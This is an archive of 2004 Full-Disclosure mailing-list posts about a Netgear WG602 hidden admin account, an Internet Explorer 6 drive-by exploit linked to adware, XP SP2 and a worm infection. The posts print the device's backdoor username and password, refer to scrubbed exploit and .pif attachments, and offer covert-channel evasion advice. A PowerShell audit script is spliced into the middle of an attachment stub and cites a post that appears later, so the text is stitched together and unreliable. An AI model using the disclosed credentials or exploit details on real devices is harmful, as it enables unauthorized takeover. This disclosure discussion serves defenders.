Before anybody does something stupid, remember that in the USA we really no longer have the bill of rights. We also no longer have checks and balances. We can be jailed indefinitely without even knowing what we're charged with. As for trial by jury by one's peers...guess not if it's all classified.

This is not the country I grew up in. I wonder how much longer it'll be when breaking DCMA will be considered an act of terrorism.

-Michael

PS: If you really want a good covert channel, bury text in donkey porn images on usenet posted through a chain of pgp-enabled anonymous remailers. Make sure and set each remailer to add a random delay. Pad each level with a random amount of uncompressable crap. If the NSA is really able to follow this, at least you'll be able to insure their displeasure of having to view really horrible porn. ;)

From rtoren at futures-inc.com Sun Jun 6 20:42:00 2004
From: rtoren at futures-inc.com (Rip Toren)
Date: Sun, 6 Jun 2004 15:42:00 -0400
Subject: [Full-Disclosure] Netgear WG602 Accesspoint vulnerability
In-Reply-To:
References:
Message-ID: <1086550920.40c373882ec34@webmail.futures-inc.com>

Folks;

I found a new firmware update on the Netgear product support page that removes this account, along with a couple of other fixes. I upgraded, and the login is no longer available.

Good, quick response.....

Quoting Tom Knienieder :

>
> KHAMSIN Security News
> KSN Reference: 2004-06-03 0001 TIP
> ---------------------------------------------------------------------------
>
> Title
> -----
> The Netgear WG602 Accesspoint contains an undocumented
> administrative account.
>
> Date
> ----
> 2004-06-03
>
>
> Description
> -----------
>
> The webinterface which is reachable from both interfaces (LAN/WLAN)
> contains an undocumented administrative account which cannot be disabled.
>
> Any user logging in with the username "super" and the password "5777364"
> is in complete control of the device.
>
> This vulnerability can be exploited by any person who is able to reach
> the webinterface of the device with a webbrowser.
>
> A search on Google revealed that "5777364" is actually the phone number
> of z-com Taiwan which develops and offers WLAN equipment for its OEM
> customers.
>
> Currently it is unknown whether other Vendors are shipping products
> based on z-com OEM designs.
>
> <>

--
Rip Toren
Senior Information Assurance Engineer
Futures Inc.
phone: 410-340-4033
email: rtoren at futures-inc.com
website: http://www.futures-inc.com
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
This email is for the intended recipient only. If you have received this email and you are not the intended recipient, please contact the originating party and delete the email message. Thank you. Futures Inc.
--------------------------------------------------------------------------

-------------------------------------------------
This mail sent through IMP: http://horde.org/imp/

From jkuperus at planet.nl Mon Jun 7 02:21:52 2004
From: jkuperus at planet.nl (Jelmer)
Date: Mon, 07 Jun 2004 03:21:52 +0200
Subject: [Full-Disclosure] Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan)
Message-ID: <000001c44c2d$d33df9b0$3200000a@alex>

Just when I thought it was safe to once more use internet explorer I received an email bringing my attention to this webpage http://216.130.188.219/ei2/installer.htm that according to him used an exploit that affected fully patched internet explorer 6 browsers. Being rather skeptical I carelessly clicked on the link only to witness how it automatically installed adware on my pc!!!

Now there had been reports about 0day exploits making rounds for quite some time like for instance this post

http://www.securityfocus.com/archive/1/363338/2004-05-11/2004-05-17/0
However I hadn't seen any evidence to support this up until now.

Thor Larholm as usual added to the confusion by deliberately spreading disinformation as seen in this post

http://seclists.org/lists/bugtraq/2004/May/0153.html

Attributing it to, and I quote, "just one of the remaining IE vulnerabilities that are not yet patched"

I've attempted to write up an analysis that will show that there are at least 2 new and AFAIK unpublished vulnerabilities (feel free to prove me wrong) out there in the wild, one being fairly sophisticated

You can view it at:

http://62.131.86.111/analysis.htm

Additionally you can view a harmless demonstration of the vulnerabilities at

http://62.131.86.111/security/idiots/repro/installer.htm

Finally I also attached the source files to this message

-------------- next part --------------
A non-text attachment was scrubbed...
Name: exploit.zip
Type: application/octet-stream
Size: 1686 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040607/6f508997/attachment.obj

From chris at compucounts.com Mon Jun 7 03:06:01 2004
From: chris at compucounts.com (Chris Carlson)
Date: Sun, 6 Jun 2004 22:06:01 -0400
Subject: [Full-Disclosure] Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan)
Message-ID:

When run remotely:

Line: 1
Char: 1
Error: Access is denied.
Code: 0
URL: http://62.131.86.111/security/idiots/repro/installer.htm

When run locally, software installation is blocked.

Using IE 6.0.2900.2096 SP2, WinXP SP2

I've gotta say that SP2 has some VERY nice protection builtin.
On the downside, I still haven't figured out how to turn it off ;)

> -----Original Message-----
> From: full-disclosure-admin at lists.netsys.com
> [mailto:full-disclosure-admin at lists.netsys.com] On Behalf Of Jelmer
> Sent: Sunday, June 06, 2004 21:22
> To: bugtraq at securityfocus.com
> Cc: full-disclosure at lists.netsys.com; peter at diplomatmail.net
> Subject: [Full-Disclosure] Internet explorer 6 execution of
> arbitrary code (An analysis of the 180 Solutions Trojan)
>
> Just when I thought it was safe to once more use internet
> explorer I received an email bringing my attention to this
> webpage http://216.130.188.219/ei2/installer.htm that
> according to him used an exploit that affected fully patched
> internet explorer 6 browsers. Being rather skeptical I
> carelessly clicked on the link only to witness how it
> automatically installed adware on my pc!!!
>
> Now there had been reports about 0day exploits making rounds
> for quite some time like for instance this post
>
> http://www.securityfocus.com/archive/1/363338/2004-05-11/2004-05-17/0
>
> However I hadn't seen any evidence to support this up until
> now Thor Larholm as usual added to the confusion by
> deliberately spreading disinformation as seen in this post
>
> http://seclists.org/lists/bugtraq/2004/May/0153.html
>
> Attributing it to and I quote "just one of the remaining IE
> vulnerabilities that are not yet patched"
>
> I've attempted to write up an analysis that will show that
> there are at least 2 new and AFAIK unpublished
> vulnerabilities (feel free to prove me
> wrong) out there in the wild, one being fairly sophisticated
>
> You can view it at:
>
> http://62.131.86.111/analysis.htm
>
> Additionally you can view a harmless demonstration of the
> vulnerabilities at
>
> http://62.131.86.111/security/idiots/repro/installer.htm
>
> Finally I also attached the source files to this message
>
>

From jkuperus at planet.nl Mon Jun 7 03:17:28 2004
From: jkuperus at planet.nl (Jelmer)
Date: Mon, 07 Jun 2004 04:17:28 +0200
Subject: [Full-Disclosure] Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan)
In-Reply-To:
Message-ID: <000001c44c35$98334110$3200000a@alex>

I haven't installed SP2 yet since I heard a lot of complaints from people who claimed it caused instability, it had memory management issues, some drivers didn't work, security measures a bit too much in your face etc.

But I reviewed the list of changes sometime back and I concur, it looks very promising. I think in the near future an IE exploit will be a rare occurrence as opposed to a bi-weekly event.

-----Original Message-----
From: Chris Carlson [mailto:chris at compucounts.com]
Sent: maandag 7 juni 2004 4:06
To: Jelmer
Cc: full-disclosure at lists.netsys.com; bugtraq at securityfocus.com
Subject: RE: [Full-Disclosure] Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan)

When run remotely:

Line: 1
Char: 1
Error: Access is denied.
Code: 0
URL: http://62.131.86.111/security/idiots/repro/installer.htm

When run locally, software installation is blocked.

Using IE 6.0.2900.2096 SP2, WinXP SP2

I've gotta say that SP2 has some VERY nice protection builtin.
On the downside, I still haven't figured out how to turn it off ;)

> -----Original Message-----
> From: full-disclosure-admin at lists.netsys.com [mailto:full-disclosure-admin at lists.netsys.com] On Behalf Of Jelmer
> Sent: Sunday, June 06, 2004 21:22
> To: bugtraq at securityfocus.com
> Cc: full-disclosure at lists.netsys.com; peter at diplomatmail.net
> Subject: [Full-Disclosure] Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan)
>
> Just when I thought it was safe to once more use internet explorer I received an email bringing my attention to this webpage http://216.130.188.219/ei2/installer.htm that according to him used an exploit that affected fully patched internet explorer 6 browsers. Being rather skeptical I carelessly clicked on the link only to witness how it automatically installed adware on my pc!!!
>
> Now there had been reports about 0day exploits making rounds for quite some time like for instance this post
>
> http://www.securityfocus.com/archive/1/363338/2004-05-11/2004-05-17/0
>
> However I hadn't seen any evidence to support this up until now. Thor Larholm as usual added to the confusion by deliberately spreading disinformation as seen in this post
>
> http://seclists.org/lists/bugtraq/2004/May/0153.html
>
> Attributing it to and I quote "just one of the remaining IE vulnerabilities that are not yet patched"
>
> I've attempted to write up an analysis that will show that there are at least 2 new and AFAIK unpublished vulnerabilities (feel free to prove me wrong) out there in the wild, one being fairly sophisticated
>
> You can view it at:
>
> http://62.131.86.111/analysis.htm
>
> Additionally you can view a harmless demonstration of the vulnerabilities at
>
> http://62.131.86.111/security/idiots/repro/installer.htm
>
> Finally I also attached the source files to this message
>

From larry at larryseltzer.com Mon Jun 7 03:42:51 2004
From: larry at larryseltzer.com (Larry Seltzer)
Date: Sun, 6 Jun 2004 22:42:51 -0400
Subject: [Full-Disclosure] Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan)
In-Reply-To: <000001c44c2d$d33df9b0$3200000a@alex>
Message-ID: <200406070243.i572hHv20372@netsys.com>

>>Finally I also attached the source files to this message

My McAfee-based gateway scanner blocks the attachment and labels it as "VBS/Psyme", which has this description (http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=100749):

"This trojan exploits an unpatched (at the time of this writing) vulnerability in Internet Explorer. The vulnerability allows for the writing, and overwriting, of local files by exploiting the ADODB.Stream object. There are several variants of this trojan. Therefore this description is designed to give an overview of how the trojan works. The trojan exists as VBScript. This script contains instructions to download a remote executable, save it to a specified location on the local disk, and then execute it."

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.ziffdavis.com/seltzer
larryseltzer at ziffdavis.com

From PerrymonJ at bek.com Mon Jun 7 04:35:46 2004
From: PerrymonJ at bek.com (Perrymon, Josh L.)
Date: Sun, 6 Jun 2004 22:35:46 -0500
Subject: [Full-Disclosure] another new worm submission
Message-ID: <5E1F351F4AE1D611A7FE00B0D0AB064A023532B1@is6b>

I agree. Anyone that would have those ports open has a *lot more to worry about than cleaning a few worm infections. That's not the case here. This infection was caused by a remote user not a Lan user. With several hundred laptops it's hard to have 0 exposure. As with any growing security practice and today's decreased budgets areas of focus are determined on risk exposure.

Anywho- I found the Trojan to be backdoor.nibu.g- although Symantec AV didn't pick it up until tonight.

I think this is a good example that perimeter security is only part of the battle. Tomorrow's morning meeting will stress the importance of desktop firewalls again and a good patch management process. You can talk until you're blue in the face to upper management but I find 90% to be reactive.

Oh well-

JP

-----Original Message-----
From: Ron DuFresne [mailto:dufresne at winternet.com]
Sent: Saturday, June 05, 2004 5:38 PM
To: Jerry Heidtke
Cc: Paul Schmehl; full-disclosure at netsys.com
Subject: Re: [Full-Disclosure] another new worm submission

[SNIP]

> >>
> >> How are these systems getting compromised? Why don't you have this patch deployed yet? Why are these systems reachable from the Internet over port 445?
> >>
> > For someone who knows nothing about his network, you sure are willing to make a lot of assumptions. You admit you don't know how the systems were compromised and you don't know what compromised them, yet you castigate him for leaving port 445 open and not patching and you assume this happened *remotely*?
> >>

[SNIP]

> You're right, I made an assumption that the systems were being compromised remotely rather than being deliberately and maliciously hacked by insiders. Would this somehow be less of a problem?
> Having systems with routable addresses reachable through port 445 is the most likely avenue of compromise, if this is not the case then Josh would be well advised to determine exactly what is going on with his network.
>

Agreed here, anyone sitting with exposed windows specific ports on the insecure Internet is pretty much deserving of what hits them these days. Without tackling that side of the coin, it's going to be pretty hard for these folks to determine if the troubles they are facing are internal or not. Without control of the perimeter choke point, how can one even think to start to look at controls of the whole danged wire inside? Perhaps we need to adapt personal firewall day to a monthly thing for the next 5 years or more to help these clueless souls.

[SNIP]

Thanks,

Ron DuFresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

From jkuperus at planet.nl Mon Jun 7 04:51:13 2004
From: jkuperus at planet.nl (Jelmer)
Date: Mon, 07 Jun 2004 05:51:13 +0200
Subject: [Full-Disclosure] Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan)
In-Reply-To: <200406070243.i572hHv20372@netsys.com>
Message-ID: <000001c44c42$b0da5e30$3200000a@alex>

Most recent exploits are like vehicles, they are assembled piece by piece, you can make a virus scanner detect the wheels, but a car, a bus and a bike are most certainly entirely different things!
Yet none of them are any good without wheels, oh and in this case painting the wheel another color would circumvent detection, it's just that trivial, virus scanners are pretty useless against these type of attacks

From the Psyme description:

"The vulnerability allows for the writing, and overwriting, of local files by exploiting the ADODB.Stream object"

As I wrote in the analysis, this exploit uses both known and unknown vulnerabilities. What is detected as Psyme (the wheels) is what I described in this post

http://seclists.org/lists/fulldisclosure/2003/Aug/1703.html

And is used in this exploit as well. However this flaw that has gone unpatched for many many months only works when run from a file on the local hard drive!, so essentially it's a useless find unless you can complement it with one or more other vulnerabilities

Over the past couple of months it's been combined with many an exploit

I used it in combination with one of liu's finds
http://lists.netsys.com/pipermail/full-disclosure/2003-September/009992.html

Andreas sandblad used it:
http://www.forbiddenweb.org/viewtopic.php?t=5242&view=previous

Mindwarper used it:
http://www.securityfocus.com/archive/1/342471

Some unknown person used it in the wild and wrote a worm, http-equiv did a writeup on it
http://seclists.org/lists/fulldisclosure/2004/Mar/1404.html

many many more people used it

But they are all separate exploits and none of the aforementioned ones work anymore, they have been patched and dealt with, well except on thor's pc naturally ;) but thor deserves only mockery

-----Original Message-----
From: full-disclosure-admin at lists.netsys.com [mailto:full-disclosure-admin at lists.netsys.com] On Behalf Of Larry Seltzer
Sent: maandag 7 juni 2004 4:43
To: 'Jelmer'; bugtraq at securityfocus.com
Cc: full-disclosure at lists.netsys.com; peter at diplomatmail.net
Subject: RE: [Full-Disclosure] Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan)

>>Finally I also attached
>>the source files to this message

My McAfee-based gateway scanner blocks the attachment and labels it as "VBS/Psyme", which has this description (http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=100749):

"This trojan exploits an unpatched (at the time of this writing) vulnerability in Internet Explorer. The vulnerability allows for the writing, and overwriting, of local files by exploiting the ADODB.Stream object. There are several variants of this trojan. Therefore this description is designed to give an overview of how the trojan works. The trojan exists as VBScript. This script contains instructions to download a remote executable, save it to a specified location on the local disk, and then execute it."

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.ziffdavis.com/seltzer
larryseltzer at ziffdavis.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

From chris at compucounts.com Mon Jun 7 05:11:22 2004
From: chris at compucounts.com (Chris Carlson)
Date: Mon, 7 Jun 2004 00:11:22 -0400
Subject: [Full-Disclosure] WinXP SP2 comments (was: Internet explorer 6 execution of arbitrary code)
Message-ID:

No complaints from me. While the new "security center" complains about how I don't have a firewall or antivirus installed (it doesn't detect either), the better security more than makes up for this minor annoyance - I no longer need to worry about where I go because the simple yet absolute 'no popups' and 'no software installations' security settings lock IE down so well.

A note about the security center- I *think* it can be disabled by editing the %systemroot%\inf\sysoc.inf file to show the entry for it in add/remove windows components. I've tried to do this, but it either does not have immediate results, or does not work.
I haven't done any real research on it because of a lack of time (or perhaps patience), but would like to know how to get rid of this if anyone knows.

I think VirtualPC and SP2 have problems coexisting, since VirtualPC has never worked properly for me (host BSOD when starting a VM or VM BSOD while installing; comments?), but that aside I've seen no apparent problems- instability, memory management or otherwise.

After attempting to uninstall SP2 (beta, not RC1 - all other comments are regarding RC1), many windows components claimed I was still running SP2, while others claimed SP1. I think this may have caused some problems when attempting to install a second (very old) video adapter (BSOD, lockups, etc), but there's no way to be sure of it. It appears to just be a quirk in the installer.

/c

> -----Original Message-----
> From: Jelmer [mailto:jkuperus at planet.nl]
> Sent: Sunday, June 06, 2004 22:17
> To: Chris Carlson
> Cc: full-disclosure at lists.netsys.com
> Subject: RE: [Full-Disclosure] Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan)
>
> I haven't installed SP2 yet since I heard a lot of complaints from people who claimed it caused instability, it had memory management issues, some drivers didn't work, security measures a bit too much in your face etc
>
> But I reviewed the list of changes sometime back and I concur, it looks very promising, I think in the near future an IE exploit will be a rare occurrence as opposed to a bi weekly event
>
> -----Original Message-----
> From: Chris Carlson [mailto:chris at compucounts.com]
> Sent: maandag 7 juni 2004 4:06
> To: Jelmer
> Cc: full-disclosure at lists.netsys.com; bugtraq at securityfocus.com
> Subject: RE: [Full-Disclosure] Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan)
>
> When run remotely:
>
> Line: 1
> Char: 1
> Error: Access is denied.
> Code: 0
> URL: http://62.131.86.111/security/idiots/repro/installer.htm
>
> When run locally, software installation is blocked.
>
> Using IE 6.0.2900.2096 SP2, WinXP SP2
>
> I've gotta say that SP2 has some VERY nice protection builtin. On the downside, I still haven't figured out how to turn it off ;)
>
> > -----Original Message-----
> > From: full-disclosure-admin at lists.netsys.com [mailto:full-disclosure-admin at lists.netsys.com] On Behalf Of Jelmer
> > Sent: Sunday, June 06, 2004 21:22
> > To: bugtraq at securityfocus.com
> > Cc: full-disclosure at lists.netsys.com; peter at diplomatmail.net
> > Subject: [Full-Disclosure] Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan)
> >
> > Just when I thought it was safe to once more use internet explorer I received an email bringing my attention to this webpage http://216.130.188.219/ei2/installer.htm that according to him used an exploit that affected fully patched internet explorer 6 browsers. Being rather skeptical I carelessly clicked on the link only to witness how it automatically installed adware on my pc!!!
> >
> > Now there had been reports about 0day exploits making rounds for quite some time like for instance this post
> >
> > http://www.securityfocus.com/archive/1/363338/2004-05-11/2004-05-17/0
> >
> > However I hadn't seen any evidence to support this up until now. Thor Larholm as usual added to the confusion by deliberately spreading disinformation as seen in this post
> >
> > http://seclists.org/lists/bugtraq/2004/May/0153.html
> >
> > Attributing it to and I quote "just one of the remaining IE vulnerabilities that are not yet patched"
> >
> > I've attempted to write up an analysis that will show that there are at least 2 new and AFAIK unpublished vulnerabilities (feel free to prove me wrong) out there in the wild, one being fairly sophisticated
> >
> > You can view it at:
> >
> > http://62.131.86.111/analysis.htm
> >
> > Additionally you can view a harmless demonstration of the vulnerabilities at
> >
> > http://62.131.86.111/security/idiots/repro/installer.htm
> >
> > Finally I also attached the source files to this message
> >

From raju at linux-delhi.org Mon Jun 7 05:24:30 2004
From: raju at linux-delhi.org (raju at linux-delhi.org)
Date: Mon, 7 Jun 2004 09:54:30 +0530
Subject: [Full-Disclosure] Re: Word file
Message-ID: <200406070417.i574H1v18081@netsys.com>

Here is the file.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: document_word.pif
Type: application/octet-stream
Size: 17920 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040607/318b186a/attachment.obj

From debian-security-announce at lists.debian.org Mon Jun 7 05:35:26 2004
From: debian-security-announce at lists.debian.org (debian-security-announce at lists.debian.org)
Date: Mon, 7 Jun 2004 06:35:26 +0200 (CEST)
Subject: [Full-Disclosure] [SECURITY] [DSA 516-1] New odbc-postgresql packages fix denial of service
Message-ID:

An embedded and charset-unspecified text was scrubbed...
Name: not available
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040607/e0c028d7/attachment.ksh

From poof at fansubber.com Mon Jun 7 06:11:37 2004
From: poof at fansubber.com (Poof)
Date: Mon, 7 Jun 2004 01:11:37 -0400
Subject: [Full-Disclosure] WinXP SP2 comments (was: Internet explorer 6 execution of arbitrary code)
In-Reply-To:
Message-ID: <200406070511.i575Blv03328@netsys.com>

> While the new "security center" complains about how I don't have a firewall or antivirus installed (it doesn't detect either), the better security more than makes up for this minor annoyance - I no longer need to worry about where I go because the simple yet absolute 'no popups' and 'no software installations' security settings lock IE down so well.

Well, the "Security Center" will only detect your firewall/antivirus if the program tells Windows that it's protecting your computer. (New API Microsoft did... Many companies are using it now.)

> A note about the security center- I *think* it can be disabled by editing the %systemroot%\inf\sysoc.inf file to show the entry for it in add/remove windows components. I've tried to do this, but it either does not have immediate results, or does not work. I havn't done any real research on it because of a lack of time (or perhaps patience), but would like to know how to get rid of this if anyone knows.

Well, all you have to do to disable it... Is disable the "Security Center" service in the services.msc! Gasp! Easy. =)

BTW. Uninstalling a service pack isn't 100% supported. It's recommended to wipe and reinstall.

~

-------------- next part --------------
A non-text attachment was scrubbed...
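Two points in the thread so far come down to state an administrator can read straight off a machine: Poof's remark that the Security Center only reports what a product has registered with it (and that the "Security Center" service is the switch), and the McAfee description Larry Seltzer quoted, where the payload rides on the ADODB.Stream object writing local files. The following PowerShell audit script is an added example and is not code posted in this thread or shipped by Microsoft. It assumes the WMI namespaces root\SecurityCenter (XP SP2) and root\SecurityCenter2 (Vista and later), and that bit 0x400 in Internet Explorer's per-CLSID "Compatibility Flags" value is the kill bit, the mechanism Microsoft later used to disable ADODB.Stream in IE. The ADODB.Stream CLSID is resolved from its ProgID in HKCR rather than hard-coded. The script only reads; it changes nothing.

```powershell
# Added audit example (not from this thread or from Microsoft). Read-only.
# Reports (1) the state of the Security Center service and which products have
# registered themselves as AV/firewall, and (2) whether ADODB.Stream is
# kill-bitted for Internet Explorer. Run from an elevated PowerShell prompt.
# Assumptions: namespaces root\SecurityCenter / root\SecurityCenter2;
# kill bit = 0x400 in "Compatibility Flags" under ActiveX Compatibility\{CLSID}.

function Get-SecurityCenterState {
    # wscsvc is the "Security Center" service Poof refers to. If it is stopped
    # the tray warnings vanish, so its state is the first thing worth logging.
    $svc = Get-Service -Name wscsvc -ErrorAction SilentlyContinue
    $state = if ($svc) { $svc.Status.ToString() } else { 'not installed' }

    $products = @()
    foreach ($ns in 'root\SecurityCenter', 'root\SecurityCenter2') {
        foreach ($class in 'AntiVirusProduct', 'FirewallProduct') {
            $instances = Get-CimInstance -Namespace $ns -ClassName $class -ErrorAction SilentlyContinue
            foreach ($p in $instances) {
                # pathToSignedProductExe exists only in SecurityCenter2. A product
                # that is registered but has no signed executable on disk is the
                # "just tells Windows it protects you" case Nils describes.
                $exe = $p.pathToSignedProductExe
                $exeExists = $null
                if ($exe) { $exeExists = Test-Path -LiteralPath $exe }
                $products += [pscustomobject]@{
                    Namespace = $ns
                    Class     = $class
                    Name      = $p.displayName
                    Exe       = $exe
                    ExeExists = $exeExists
                }
            }
        }
    }
    [pscustomobject]@{ ServiceState = $state; Products = $products }
}

function Test-AdodbStreamKillBit {
    # Resolve the CLSID from the ProgID instead of hard-coding it.
    $clsidKey = Get-ItemProperty -Path 'Registry::HKEY_CLASSES_ROOT\ADODB.Stream\CLSID' -ErrorAction SilentlyContinue
    $clsid = if ($clsidKey) { $clsidKey.'(default)' } else { $null }
    if (-not $clsid) {
        return [pscustomobject]@{ Clsid = $null; KillBitSet = $false; Note = 'ADODB.Stream ProgID not registered' }
    }

    # IE refuses to instantiate a control whose Compatibility Flags has bit 0x400 set.
    $compatKey = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid"
    $flags = (Get-ItemProperty -Path $compatKey -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    $note = if ($null -eq $flags) { 'no Compatibility Flags value' } else { 'Compatibility Flags = 0x{0:X}' -f $flags }
    [pscustomobject]@{
        Clsid      = $clsid
        KillBitSet = [bool](($flags -band 0x400) -ne 0)
        Note       = $note
    }
}

$sc = Get-SecurityCenterState
"Security Center service (wscsvc): $($sc.ServiceState)"
if ($sc.Products.Count -eq 0) { 'No AV or firewall products are registered with Security Center.' }
else { $sc.Products | Format-Table -AutoSize }
Test-AdodbStreamKillBit | Format-List
```

A registered product whose ExeExists column is False (or whose Exe is empty on a SecurityCenter2 host) deserves a closer look, since that is exactly what a program that does nothing but register itself would look like; on XP SP2 the older namespace carries no executable path, so there the output only tells you what the machine has been told, not whether it is true.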
Name: smime.p7s
Type: application/x-pkcs7-signature
Size: 2813 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040607/e38e6692/attachment.bin

From scottp at dreamwright.com Mon Jun 7 07:39:16 2004
From: scottp at dreamwright.com (Scott Phelps)
Date: Mon, 7 Jun 2004 02:39:16 -0400
Subject: [Full-Disclosure] WinXP SP2 comments (was: Internet explorer 6 execution of arbitrary code)
In-Reply-To: <200406070511.i575Blv03328@netsys.com>
Message-ID: <20040607063923.XSAW6802.imf19aec.mail.bellsouth.net@maudib>

I would really watch out if trying an uninstall of SP2. My understanding is that the size of it (something like 270 M) is because you get a lot of recompiled binaries adding buffer overflow protection. It wouldn't surprise me if a few things are left behind after an uninstall.

Scott P

"They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety" Benjamin Franklin, 1759

-----Original Message-----
From: full-disclosure-admin at lists.netsys.com [mailto:full-disclosure-admin at lists.netsys.com] On Behalf Of Poof
Sent: Monday, June 07, 2004 1:12 AM
To: 'Chris Carlson'; 'Jelmer'
Cc: full-disclosure at lists.netsys.com
Subject: RE: [Full-Disclosure] WinXP SP2 comments (was: Internet explorer 6 execution of arbitrary code)

> While the new "security center" complains about how I don't have a firewall or antivirus installed (it doesn't detect either), the better security more than makes up for this minor annoyance - I no longer need to worry about where I go because the simple yet absolute 'no popups' and 'no software installations' security settings lock IE down so well.

Well, the "Security Center" will only detect your firewall/antivirus if the program tells Windows that it's protecting your computer. (New API Microsoft did... Many companies are using it now.)
> A note about the security center- I *think* it can be disabled by editing the %systemroot%\inf\sysoc.inf file to show the entry for it in add/remove windows components. I've tried to do this, but it either does not have immediate results, or does not work. I havn't done any real research on it because of a lack of time (or perhaps patience), but would like to know how to get rid of this if anyone knows.

Well, all you have to do to disable it... Is disable the "Security Center" service in the services.msc! Gasp! Easy. =)

BTW. Uninstalling a service pack isn't 100% supported. It's recommended to wipe and reinstall.

~

From adam at nhh.hu Mon Jun 7 07:39:34 2004
From: adam at nhh.hu (Szilveszter Adam)
Date: Mon, 07 Jun 2004 08:39:34 +0200
Subject: [Full-Disclosure] weather.com contact
In-Reply-To: <20040605112540.H75779@dekadens.coredump.cx>
References: <000901c44a9c$f6eb8400$547abe18@proclaimed> <20040605112540.H75779@dekadens.coredump.cx>
Message-ID: <04Jun7.084025cest.118585@fd.hif.hu>

Michal Zalewski wrote:
> On Fri, 4 Jun 2004 fd at proclaimed.net wrote:
>
>>Anyone know anyone at weather.com?
>
> No, but I must share that I am perhaps for the first time on this list truly scared of what you might have discovered.
>
> A weather control exploit?

No, I was first to discover this, but problem is I can only manage to crash the control yet, no remote code execution, and every crash causes miserable weather for 7 days in a row in the affected area so I cannot afford to experiment much, ppl are already threatening to lynch me for blowing the summer :-)

Regards:
Sz.

From yehudi at tehila.gov.il Mon Jun 7 07:56:20 2004
From: yehudi at tehila.gov.il (Yaakov Yehudi)
Date: Mon, 7 Jun 2004 09:56:20 +0300
Subject: [Full-Disclosure] WinXP SP2 comments (was: Internet explorer 6 execution of arbitrary code)
In-Reply-To: <200406070511.i575Blv03328@netsys.com>
Message-ID: <000b01c44c5c$8a0c4a60$dc09050a@tehila.gov.il>

>BTW.
>Uninstalling a service pack isn't 100% supported. It's recommended to wipe and reinstall.

Where does that statement come from? Microsoft? I'd be interested to see any references you might be able to provide.

Thanks!

From nils at druecke.strg-alt-entf.org Mon Jun 7 12:40:00 2004
From: nils at druecke.strg-alt-entf.org (Nils Ketelsen)
Date: Mon, 7 Jun 2004 07:40:00 -0400
Subject: [Full-Disclosure] WinXP SP2 comments (was: Internet explorer 6 execution of arbitrary code)
In-Reply-To: <200406070511.i575Blv03328@netsys.com>
References: <200406070511.i575Blv03328@netsys.com>
Message-ID: <20040607114000.GA14622@bug>

On Mon, Jun 07, 2004 at 01:11:37AM -0400, Poof wrote:
> Well, the "Security Center" will only detect your firewall/antivirus if the program tells Windows that it's protecting your computer. (New API Microsoft did... Many companies are using it now.)

Ohh, then I can just write a program doing nothing but telling windows it protects it to make this warning go away? Cool. There will be many of these out there when SP2 goes around. Maybe at $5 or so. Snakeoil at its best. And even proves protection by making the windows warning go away.

Nils

--
Well... It all started with a typo in a safe sex pamphlet. By the time I discovered I didn't really have to use a condor every time, I'd kind of gotten used to them.
[bsvitavsky at mln.lib.ma.us in rec.arts.comics.dc.universe]

From christoph.gruber at wave-solutions.com Mon Jun 7 13:06:21 2004
From: christoph.gruber at wave-solutions.com (Christoph Gruber)
Date: Mon, 7 Jun 2004 14:06:21 +0200
Subject: [Full-Disclosure] another new worm submission
In-Reply-To: <5E1F351F4AE1D611A7FE00B0D0AB064A023532AB@is6b>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Josh wrote 04.06.2004 21:11:26:
> http://www.detroit-x.com/analysis.htm
>
> This is something we found this morning. I have packet captures that I will post.
> I have attached the infected files found with FPORT and also registry entries.
>
> We found this rebooting machines with the LSASS.exe error similar to Sasser. As of 6/4/2004 we found no virus defs to pick it up.
>
>
> Joshua Perrymon
> Sr. Network Security Consultant

Hi there!

There is another Registry-entry:

Cheers!

- --
Christoph Gruber, Senior Security Architect
WAVE Solutions Information Technology GmbH
Nordbergstrasse 13, A - 1090 Wien, Austria
christoph.gruber at wave-solutions.com
Office: +43 1 71730 53514, Mobile: +43 664 81 22 66 1
PGP-Fingerprint: CCFF 5D66 7073 952C 7AB3 C2DF 435A C85C 558E D42B

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0.3

iQA/AwUBQMRaFkNayFxVjtQrEQKmYwCg4ufJbS1o/5/C73FUSzBQ+D77OXsAoMLD
82mFBEHVI5D0bGtwTIoLQx9G
=SKaL
-----END PGP SIGNATURE-----

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040607/933b50d4/attachment.html

From 1 at malware.com Mon Jun 7 15:31:01 2004
From: 1 at malware.com (http-equiv@excite.com)
Date: Mon, 7 Jun 2004 14:31:01 -0000
